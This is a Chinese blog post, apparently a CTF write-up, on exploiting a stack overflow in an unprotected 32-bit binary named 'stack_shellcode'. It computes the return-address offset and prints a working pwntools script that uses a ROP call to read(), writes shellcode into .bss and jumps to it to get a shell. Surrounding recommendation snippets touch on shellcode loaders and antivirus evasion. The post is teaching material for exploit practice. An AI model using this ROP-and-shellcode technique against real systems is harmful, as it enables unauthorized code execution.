stack_shellcode

最新推荐文章于 2022-07-21 17:25:41 发布
最新推荐文章于 2022-07-21 17:25:41 发布
阅读量145 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/paradise_c/article/details/107728085
版权

分析

先看文件信息,再查保护

img-pkX69O4H-1596251795285

32位,动态链接,啥保护也没有,简单到无语了

放ida,F5查伪C

image.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UIJQbWAW-1596251795297)()]

dest的数据类型是char,占1个字节,memcpy却复制了0xC8u(十进制:200)个字节到dest,存在明显的栈溢出

利用

思路

该程序用到了read函数,那么我们可以从rop直接调用read,从标准输入写入我们的payload,然后call我们的payload拿shell

从ida中可以看出变量dest到ebp的偏移量为6Ch,ebp的长度为4h,所以deal_user_info函数的ReturnAddress为6Ch+4h=70h,即112

也可以用gdb-pattern计算

在这里插入图片描述

除了偏移量,我们还需要一个地址来保存我们的read
Shift+F7查.bss段的地址(0804A040)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l16l8Npk-1596251795306)()]

Exp


    from pwn import *
	
	proc = './a'
	io = process(proc)
	
	bss_addr = 0x0804A040 
	
	context.binary = proc
	shellcode = asm(shellcraft.sh())
	
	rop = ROP(proc)
	rop.read(0,bss_addr + 0x100,len(shellcode))
	rop.call(bss_addr + 0x100)
	
	io.recvuntil('\n')
	io.sendline('a' * 112 + str(rop))
	io.sendline(shellcode)

	io.interactive()

交互

img-qEAnmNNE-1596251795306

正崽不emo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5585
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
基于SeedUbuntu16.04的缓冲区溢出实验
shshuahw的博客
08-09 929
栈溢出攻击实验 57119104 苏上峰 一.关闭防御措施 1.关闭地址随机化 在终端输入以下指令,关闭地址随机化,简化实验 sudo sysctl -w kernel.randomize_va_space=0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pGSotDs5-1628162094726)(1.png)] 2.关闭StackGuard防御机制 在编译c文件时加入以下参数 gcc -fno-stack-protector example.c #-fno-
EtherCAT Slave Stack Code (SSC)
05-28
BECKHOFF(倍福)官方提供EtherCAT从站协议栈代码生成工具 版本:SSC V5.12(Tool 1.4.2)
《C语言/C++学习指南》加密解密篇(安全相关算法)
07-07
本套视频教程介绍加密解密相关的常见算法,指出每种算法的应用场景,并给出使用示例。具体包含: (1) 数据转换(HEX和base64) (2) 对称加密 (DES, 3DES, AES) (3) 校验 CRC, MD5摘要, SHA1摘要 (4) 数字签名(HMAC-SHA1) , 并介绍了crypto++这个算法库的使用方法。
Deque实现Stack
code_java_zqy
02-07 1327
Stack只有入栈和出栈的操作: 把元素压栈:push(E); 把栈顶的元素“弹出”:pop(E); 取栈顶元素但不弹出:peek(E)。 在Java中,我们用Deque可以实现Stack的功能: 把元素压栈:push(E)/addFirst(E); 把栈顶的元素“弹出”:pop(E)/removeFirst(); 取栈顶元素但不弹出:peek(E)/peekFirst()。 为什么Java的集合类没有单独的Stack接口呢?因为有个遗留类名字就叫Stack,出于兼容性考虑,所以没办法创建Stack
栈溢出攻击和shellcode
LittleEmperor
09-16 5873
README 本文默认读者熟悉C语言编程和x86汇编语法,熟悉函数调用过程和调用规约,简单了解linux系统,包括进程内存布局,系统调用和内核内存管理机制,对栈溢出攻击有基本认知。 文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。 文章将抛开宏观层面的解释,尽量细致地阐述shellcode的构建过程和异常问题分析等诸多细节,帮助读者把栈溢出攻击和s...
shellcode帮助工具,直接把exe转shellcode
12-29
-stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - ...
ExploitDev:各种ASM,C和C ++工具,shellcode和利用实验
03-30
ExploitDev:各种ASM,C和C ++工具,shellcode和利用实验
stack-smashing:C中的缓冲区溢出程序
05-04
在src/中将提供shellcode的汇编版本。 该程序集仅支持生成Linux Shell。 Makefile不支持对其进行编译。 Linux安装 这已经在Ubuntu 14.04LTS上进行了测试,可以成功生成一个shell。 克隆回购 使用sudo sysctl
WinIo-Vidix:利用WinIo-Vidix并在Windows Kerne中运行Shellcode(本地特权升级)
05-12
在x86上,我将Stack OvferFlow转换为具有“部分堆栈溢出”的“在哪里写什么”条件,并修改用作下一个代码路径中memcpy的目标地址的局部变量,最终滥用nt!HalDispatchTable来执行此代码完美的W3条件,我们可以使用...
ctf-writeups:CTF撰写
05-17
32 NX Partial RELRO ASLR GOT format string libc database x86_64 Partial RELRO ASLR GOT PLT shellcode socket stack overflow syscall x86_32 Full RELRO PIE ASLR shellcode stack overflow syscall Writeups...
stack-code
10-16
stack-code stack-code stack-code stack-code stack-code stack-code
简单Shellcode的详细分析
wangkr的专栏
11-20 2977
作 者: moonflow 百年一遇的高级光棍节,我得写篇详细完整的文章才行。初学者,菜文,老鸟请飘过 分析段简单的shellcode代码 1.shellcode.c 代码: #include   static char shellcode[]=    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x4
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 1583
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
C语言执行shellcode的五种方法
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
Shellcode加密原理之自己动手写加密器
seaaseesa的博客
02-20 1631
shellcode是一段用于利用软件漏洞而执行的代码,在实际的软件中,某些软件对允许输入的字符范围做了限制,导致检测到非法字符,从而无法成功输入shellcode。这时就需要加密shellcode。谷歌有一个开源工具ALPHA 3,可以将shellcode加密为全ascii可见字符。其大致原理根本文我们讲的是差不多的。 本文,我们要自己实现一个shellcode加密。我们就从攻防世界的一题hol...
堆指针越界&堆上布置shellcode|攻防世界pwn进阶区 note-service2
Kni9hT's Blog
03-18 573
文章目录前言思路分析0x00.检查保护机制0x01.查看程序功能0x02.ida查看逻辑0x03.利用思路利用过程0x00.选一段shellcode布置在堆上0x01.计算jmp short指令要跳多少字节0x02.shellcode转换为asm格式0x03.通过64位传参机制把&("/bin/sh")传到rdi0x04.计算free的got地址和堆数组静态地址的距离0x05. 尝试写ex...
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
ipa在win10使用IDA检测是否开启 ___stack_chk_fail 以及 ___stack_chk_guard
最新发布
06-08
在 Windows 应用程序中,___stack_chk_fail 和 ___stack_chk_guard 都是 GCC 编译器的安全特性。___stack_chk_guard 是一个随机值,它被插入到应用程序的栈中,用于检测缓冲区溢出攻击。而 ___stack_chk_fail 是一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

正崽不emo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值